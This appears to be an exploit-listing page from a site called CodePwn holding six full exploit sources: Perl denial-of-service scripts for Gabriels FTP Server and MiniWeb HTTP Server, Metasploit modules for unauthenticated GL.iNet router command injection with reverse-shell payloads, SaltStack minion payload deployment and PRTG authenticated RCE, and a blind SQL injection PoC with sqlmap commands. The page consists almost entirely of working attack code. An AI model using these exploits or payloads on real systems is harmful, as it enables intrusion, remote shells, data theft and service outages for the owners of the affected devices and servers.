Latest exploits :: CodePwn

<pre><code>#!/usr/bin/perl use IO::Socket::INET; # Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 25 january 2024 # Vendor Homepage: N/A # Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing # Notification vendor: No reported # Tested Version: Gabriels FTP Server 1.2 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user. #When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x41\x2C\x41\x20\x42"x500; my $ftp_socket = IO::Socket::INET->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', Timeout => '10', ) or die "Não foi possível se conectar ao servidor."; my $response = <$ftp_socket>; print $ftp_socket "USER $payload\r\n"; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "######################################################################\n"; print "# Gabriels FTP Server 1.2 - Denied of Service #\n"; print "# #\n"; print "# Coded by Fernando Mengali #\n"; print "# #\n"; print "# e-mail: fernando.mengalli\@gmail.com #\n"; print "# #\n"; print "######################################################################\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'digest/md5' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.', 'Description' => %q{ A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log` interface in the `logread` module. This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen by the attacker. However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be retrieved without knowing a valid username and password. The following GL.iNet network products are vulnerable: - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0; - MT6000: v4.5.0 - v4.5.3; - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7; - E750/E750V2, MV1000: v4.3.8; - X3000: v4.0.0 - v4.4.2; - XE3000: v4.0.0 - v4.4.3; - SFT1200: v4.3.6; - and potentially others (just try ;-) NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads when using the Linux Dropper target. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor 'Unknown', # Discovery of the vulnerability CVE-2023-50445 'DZONERZY' # Discovery of the vulnerability CVE-2023-50919 ], 'References' => [ ['CVE', '2023-50445'], ['CVE', '2023-50919'], ['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'], ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'], ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'], ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md'] ], 'DisclosureDate' => '2023-12-10', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'], 'Linemax' => 900, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('SID', [false, 'Session ID']) ]) end def vuln_version? @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil } # check first with version 4.x api call post_data = { jsonrpc: '2.0', id: rand(1000..9999), method: 'call', params: [ '', 'ui', 'check_initialized', {} ] }.to_json res = send_request_cgi({ 'method' => 'POST', 'ctype' => 'text/json', 'uri' => normalize_uri(target_uri.path, 'rpc'), 'data' => post_data.to_s }) if res && res.code == 200 && res.body.include?('result') res_json = res.get_json_document unless res_json.blank? @glinet['model'] = res_json['result']['model'] @glinet['firmware'] = res_json['result']['firmware_version'] end else # check with version 3.x api call. These versions are NOT vulnerable res = send_request_cgi({ 'method' => 'GET', 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello') }) if res && res.code == 200 && res.body.include?('model') && res.body.include?('version') res_json = res.get_json_document unless res_json.blank? @glinet['model'] = res_json['model'] @glinet['firmware'] = res_json['version'] end end end # check for the vulnerable models and firmware versions case @glinet['model'] when 'sft1200' @glinet['arch'] = 'mipsle' return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6') when 'ar750', 'ar750s', 'ar300m', 'ar300m16' @glinet['arch'] = 'mipsbe' return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7') when 'mt300n-v2', 'mt1300' @glinet['arch'] = 'mipsle' return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7') when 'ap1300', 'b1300' @glinet['arch'] = 'armle' return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7') when 'e750', 'e750v2' @glinet['arch'] = 'mipsbe' return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8') when 'mv1000' @glinet['arch'] = 'armle' return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8') when 'ax1800', 'axt1800', 'a1300' @glinet['arch'] = 'armle' return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0') when 'mt2500', 'mt2500a', 'mt3000' @glinet['arch'] = 'aarch64' return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0') when 'mt6000' @glinet['arch'] = 'aarch64' return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3') when 'x3000' @glinet['arch'] = 'aarch64' return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2') when 'xe3000' @glinet['arch'] = 'aarch64' return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3') end @glinet['arch'] = 'n/a' return false end def auth_bypass # Check if datastore['SID'] is set return datastore['SID'] unless datastore['SID'].blank? # Exploit CVE-2023-50919 to retrieve the SID without valid username and password. # Send an RPC request calling the challenge method, which will return a random nonce, # the selected root user’s salt, and the crypt’s algorithm to hash the password. post_data = { jsonrpc: '2.0', id: rand(1000..9999), method: 'challenge', params: { username: 'root' } }.to_json res = send_request_cgi({ 'method' => 'POST', 'ctype' => 'text/json', 'uri' => normalize_uri(target_uri.path, 'rpc'), 'data' => post_data.to_s }) if res && res.code == 200 && res.body.include?('nonce') res_json = res.get_json_document unless res_json.blank? nonce = res_json['result']['nonce'] end else fail_with(Failure::NotFound, 'Getting the random nonce failed.') end # Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username # Use the SQL injection part to lookup the ACLs for root stored in sqlite db # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+" pw = '0' hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}") # Login with the password hash and obtain the SessionID (SID) post_data = { jsonrpc: '2.0', id: rand(1000..9999), method: 'login', params: { username: username.to_s, hash: hash.to_s } }.to_json res = send_request_cgi({ 'method' => 'POST', 'ctype' => 'text/json', 'uri' => normalize_uri(target_uri.path, 'rpc'), 'data' => post_data.to_s }) if res && res.code == 200 && res.body.include?('sid') res_json = res.get_json_document unless res_json.blank? sid = res_json['result']['sid'] end else fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.') end return sid end def execute_command(cmd, _opts = {}) payload = Base64.strict_encode64(cmd) cmd = "echo #{payload}|openssl enc -base64 -d -A|sh" post_data = { jsonrpc: '2.0', id: rand(1000..9999), method: 'call', params: [ @sid.to_s, 'logread', 'get_system_log', { lines: '', module: "|#{cmd}" } ] }.to_json return send_request_cgi({ 'method' => 'POST', 'ctype' => 'text/json', 'cookie' => "Admin-Token=#{@sid}", 'uri' => normalize_uri(target_uri.path, 'rpc'), 'data' => post_data.to_s }) end def check print_status("Checking if #{peer} can be exploited.") # Check if target is a GL.iNet network device and the firmware version is vulnerable return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version? unless @glinet['firmware'].nil? # GL.iNet network devices with firmware version 3.x that are safe from this exploit return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0') # GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a) if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')) return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") end return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') end # No GL.iNet network device or not reachable CheckCode::Unknown('No GL.iNet network device or device is not responding.') end def exploit @sid = auth_bypass print_status("SID: #{@sid}") print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper # Don't check the response here since the server won't respond # if the payload is successfully executed. execute_cmdstager({ linemax: target.opts['Linemax'] }) end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Local::Saltstack prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Saltstack Minion Payload Deployer', 'Description' => %q{ This exploit module uses saltstack salt to deploy a payload and run it on all targets which have been selected (default all). Currently only works against nix targets. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'c2Vlcgo' ], 'Platform' => [ 'linux', 'unix' ], 'Stance' => Msf::Exploit::Stance::Passive, 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [], 'DisclosureDate' => '2011-03-19', # saltstack salt original release date 'DefaultTarget' => 0, 'Passive' => true, # this allows us to get multiple shells calling home 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK] } ) ) register_options [ OptString.new('SALT', [true, 'salt-master executable location', '']), OptString.new('MINIONS', [true, 'Minions Target', '*']), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('TargetWritableDir', [ true, 'A directory where we can write and execute files on targets', '/tmp' ]), OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]), OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]), OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run in seconds', 120]) ] end def salt_master return @salt if @salt [datastore['SALT'], '/usr/bin/salt-master', '/usr/local/bin/salt-master'].each do |exec| next unless executable?(exec) @salt = exec return @salt end @salt end def list_minions_printer minions = list_minions return if minions.nil? tbl = Rex::Text::Table.new( 'Header' => 'Minions List', 'Indent' => 1, 'Columns' => ['Status', 'Minion Name'] ) count = 0 minions['minions'].each do |minion| tbl << ['Accepted', minion] count += 1 end print_good(tbl.to_s) # https://github.com/rapid7/metasploit-framework/pull/18626#discussion_r1434577017 print_good("#{count} minions were found in the accepted state, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.") Rex.sleep(10) count end def check return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil? CheckCode::Vulnerable('salt-master executable found') end def exploit # Make sure we can write our exploit and payload to the local system fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir'] count = 1 # default to running if we decide not to calculate count = list_minions_printer if datastore['CALCULATE'] fail_with Failure::NotFound, 'No exploitable minions found.' if count == 0 payload_name = rand_text_alphanumeric(5..10) # due to a bug in older (2021) versions of salt-cp, we need to write ascii files. https://github.com/saltstack/salt/issues/59899 upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", Rex::Text.encode_base64(generate_payload_exe) print_status('Copying payload to minions') cmd_exec("salt-cp '#{datastore['MINIONS']}' '#{datastore['WritableDir']}/#{payload_name}' '#{datastore['TargetWritableDir']}/#{payload_name}.b64'") print_status('Executing payloads') cmd_exec("salt '#{datastore['MINIONS']}' cmd.run 'base64 -d #{datastore['TargetWritableDir']}/#{payload_name}.b64 > #{datastore['TargetWritableDir']}/#{payload_name} && chmod 755 #{datastore['TargetWritableDir']}/#{payload_name} && #{datastore['TargetWritableDir']}/#{payload_name}'") # stolen from exploit/multi/handler stime = Time.now.to_f timeout = datastore['ListenerTimeout'].to_i loop do break if timeout > 0 && (stime + timeout < Time.now.to_f) Rex::ThreadSafe.sleep(1) end end def on_new_session(_session) super cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi') begin print_warning("Deleting: #{datastore['TargetWritableDir']}/#{payload_name}") cli.fs.file.rm("#{datastore['TargetWritableDir']}/#{payload_name}") print_good("#{datastore['TargetWritableDir']}/#{payload_name} removed") rescue StandardError print_error("Unable to delete: #{datastore['TargetWritableDir']}/#{payload_name}") end end end </code></pre>

<pre><code># Exploit Title: Employee Management System - SQLi # Date: 23/03/2024 # Exploit Author: Özlem Balcı # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Software Download: https://www.sourcecodester.com/download-code?nid=16999&title=Employee+Management+System+using+PHP+and+MySQL # Version: 1.0 # Tested on: Mac OS ## Description A Time-Based Blind SQL injection vulnerability in the login page (/employee_akpoly/Account/login.php) in Employee Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "txtemail" parameter ## Request PoC POST /employee_akpoly/Account/login.php HTTP/1.1 Host: localhost Content-Length: 55 Cache-Control: max-age=0 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/employee_akpoly/Account/login.php Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf Connection: close txtemail=test%40test.com&txtpassword=12345A&E&btnlogin= This request causes an error. Adding ' AND (SELECT 2092 FROM (SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE to the end of "txtemail" parameter, the response to request was 302 status code with message of Found, but 11 seconds later, which indicates that our sleep 11 command works. POST /employee_akpoly/Account/login.php HTTP/1.1 Host: localhost Content-Length: 117 Cache-Control: max-age=0 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/employee_akpoly/Account/login.php Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf Connection: close txtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin sqlmap -r emp.txt --risk=3 --level=3 --dbms=mysql --is-dba --users --privileges --role Parameter: txtemail (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(5)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin=[image: Employee Management System 1.png][image: Employee Management System2.png] </code></pre>

<pre><code>#!/usr/bin/perl use IO::Socket; # Exploit Title: MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 24 january 2024 # Vendor Homepage: N/A # Download to demo: https://drive.google.com/file/d/1935vpOZJPFJqnwTMPdkXTvoblA1SzBEK/view?usp=sharing # Notification vendor: No reported # Tested Version: MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS) # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denied of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=2yVPUO-rl1E #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Backwards jump to code a known distance from the stack pointer. #The web server does not correctly handle the amount of data or bytes sent to server. #When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x41" x 2038; my $http_req = "POST /index.html HTTP/1.1\r\n"; $http_req .= "Host: $ip\r\n"; $http_req .= "From: header-data\r\n"; $http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; $http_req .= $payload; my $socket = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) or die "[-] Could not connect\n"; $socket->send($http_req); $socket->close(); print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { _/| // o\ || ._) //__\ )___( [+] MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } </code></pre>

<pre><code>class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Retry def initialize(info = {}) super( update_info( info, 'Name' => 'PRTG CVE-2023-32781 Authenticated RCE', 'Description' => %q{ Authenticated RCE in Paessler PRTG }, 'License' => MSF_LICENSE, 'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'], 'References' => [ [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'], [ 'CVE', '2023-32781'] ], 'DisclosureDate' => '2023-08-09', 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'Windows_Fetch', { 'Arch' => [ ARCH_CMD ], 'Platform' => 'win', 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' }, 'Type' => :win_fetch } ], [ 'Windows_CMDStager', { 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'win', 'Type' => :win_cmdstager, 'CmdStagerFlavor' => [ 'psh_invokewebrequest' ] } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => {}, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options( [ OptString.new( 'USERNAME', [ true, 'The username to authenticate with', 'prtgadmin' ] ), OptString.new( 'PASSWORD', [ true, 'The password to authenticate with', 'prtgadmin' ] ), OptString.new( 'TARGETURI', [ true, 'The URI for the PRTG web interface', '/' ] ) ] ) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['URI'], '/index.htm') }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError return CheckCode::Unknown ensure disconnect end if res && res.code == 200 prtg_server_header = res.headers['Server'] if (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG') return CheckCode::Detected end end return CheckCode::Unknown end def exploit @sensors_to_delete = [] connect case target['Type'] when :win_cmdstager execute_cmdstager when :win_fetch execute_command(payload.encoded) end end def on_new_session(client) super @sensors_to_delete.each do |sensor_id| delete_sensor_by_id(sensor_id) end print_good('Session created') end def execute_command(cmd, _opts = {}) print_status('Running PRTG RCE exploit') authenticate_prtg bat_file_name = write_bat_file_to_disk(cmd) run_bat_file_from_disk(bat_file_name) print_status('Exploit done') handler end def authenticate_prtg print_status('Authenticating against PRTG') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'public', 'checklogin.htm'), 'keep_cookies' => true, 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } }) unless res fail_with(Failure::NoAccess, 'Failure to connect to PRTG') end if res && res.code == 302 && res.get_cookies print_good('Successfully authenticated against PRTG') else fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG') end end def get_csrf_token res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'welcome.htm'), 'keep_cookies' => true }) if res.nil? || res.body.nil? fail_with(Failure::NoAccess, 'Page with CSRF token not available') end regex = /csrf-token" content="([^"]+)"/ token = res.body[regex, 1] print_status("Extracted csrf token: #{token}") token end def delete_sensor_by_id(sensor_id) print_status("Deleting sensor #{sensor_id}") csrf_token = get_csrf_token res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api', 'deleteobject.htm'), 'keep_cookies' => true, 'headers' => { 'anti-csrf-token' => csrf_token, 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => { id: sensor_id, approve: 1 } }) if res.nil? || res.body.nil? fail_with(Failure::NoAccess, 'Sensor deletion failed') end end def get_created_sensor_id(sensor_name) print_status('Fetching created sensor id') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'controls', 'deviceoverview.htm'), 'keep_cookies' => true, 'vars_get' => { 'id' => 40 } }) if res.nil? || res.body.nil? fail_with(Failure::NoAccess, 'Page with sensorid not available') end regex = /id=([0-9]+)">#{sensor_name}/ sensor_id = res.body[regex, 1] print_status("Extracted sensor_id: #{sensor_id}") sensor_id end def run_sensor_with_id(sensor_id) csrf_token = get_csrf_token res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api', 'scannow.htm'), 'keep_cookies' => true, 'headers' => { 'anti-csrf-token' => csrf_token, 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => { id: sensor_id } }) if res && res.code == 200 print_good('Sensor started running') else fail_with(Failure::NoAccess, 'Failure to run sensor') end end def write_bat_file_to_disk(cmd) # Uses the HL7Sensor for writing a .bat file to the disk cmd = cmd.gsub! '\\', '\\\\\\' print_status('Writing .bat to disk') csrf_token = get_csrf_token # Generate a random sensor name sensor_name = Rex::Text.rand_text_alphanumeric(8..10) bat_file_name = "#{Rex::Text.rand_text_alphanumeric(8..10)}.bat" # Clean up the .bat file cmd = "#{cmd} & del %0" print_status("Generated sensor_name #{sensor_name}") print_status("Generated bat_file_name #{bat_file_name}") params = { 'name_' => sensor_name, 'parenttags_' => '', 'tags_' => 'dicom hl7', 'priority_' => '3', 'port_' => '104', 'timeout_' => '60', 'override_' => '0', 'sendapp_' => Rex::Text.rand_text_alphanumeric(4..5), 'sendfac_' => Rex::Text.rand_text_alphanumeric(4..5), 'recvapp_' => Rex::Text.rand_text_alphanumeric(4..5), 'recvfac_' => "#{Rex::Text.rand_text_alphanumeric(4..5)}\" -debug=\"..\\Custom Sensors\\EXE\\#{bat_file_name}\" -recvapp=\"#{Rex::Text.rand_text_alphanumeric(4..5)}", 'hl7file_' => "ADT_& #{cmd} & A08.hl7|ADT_A08.hl7||", 'hl7filename' => '', 'intervalgroup' => ['0', '1'], 'interval_' => '60|60 seconds', 'errorintervalsdown_' => '1', 'inherittriggers' => '1', 'id' => '40', 'sensortype' => 'hl7', 'tmpid' => '2', 'anti-csrf-token' => csrf_token } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'), 'keep_cookies' => true, 'vars_post' => params }) unless res fail_with(Failure::NoAccess, 'Failure to connect to PRTG') end if res && res.code == 302 print_good('HL7 Sensor succesfully created') else fail_with(Failure::NoAccess, 'Failure to create HL7 sensor') end # Actually creating the sensor can take 1-2 seconds print_status('Checking for sensor creation') sensor_id = retry_until_truthy(timeout: 10) do get_created_sensor_id(sensor_name) end print_status('Requesting HL7 Sensor to initiate scan') run_sensor_with_id(sensor_id) @sensors_to_delete.push(sensor_id) print_good('.bat file written to disk') bat_file_name end def run_bat_file_from_disk(bat_file_name) print_status("Running the .bat file: #{bat_file_name}") csrf_token = get_csrf_token sensor_name = Rex::Text.rand_text_alphanumeric(8..10) params = { 'name_' => sensor_name, 'parenttags_' => '', 'tags_' => 'exesensor', 'priority_' => '3', 'scriptplaceholdergroup' => '1', 'scriptplaceholder1description_' => '', 'scriptplaceholder1_' => '', 'scriptplaceholder2description_' => '', 'scriptplaceholder2_' => '', 'scriptplaceholder3description_' => '', 'scriptplaceholder3_' => '', 'scriptplaceholder4description_' => '', 'scriptplaceholder4_' => '', 'scriptplaceholder5description_' => '', 'scriptplaceholder5_' => '', 'exefile_' => "#{bat_file_name}|#{bat_file_name}||", 'exefilelabel' => '', 'exeparams_' => '', 'environment_' => '0', 'usewindowsauthentication_' => '0', 'mutexname_' => '', 'timeout_' => '60', 'valuetype_' => '0', 'channel_' => 'Value', 'unit_' => '#', 'monitorchange_' => '0', 'writeresult_' => '0', 'intervalgroup' => '0', 'interval_' => '43200|12 hours', 'errorintervalsdown_' => '1', 'inherittriggers' => '1', 'id' => '40', 'sensortype' => 'exe', 'tmpid' => '6', 'anti-csrf-token' => csrf_token } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'), 'keep_cookies' => true, 'vars_post' => params }) unless res fail_with(Failure::NoAccess, 'Failure to connect to PRTG') end if res && res.code == 302 print_status('EXE Script sensor created') else fail_with(Failure::NoAccess, 'Failure to create EXE Script sensor') end print_status('Checking for sensor creation') sensor_id = retry_until_truthy(timeout: 10) do get_created_sensor_id(sensor_name) end run_sensor_with_id(sensor_id) @sensors_to_delete.push(sensor_id) print_good('Exploit completed. Waiting for payload') end end </code></pre>

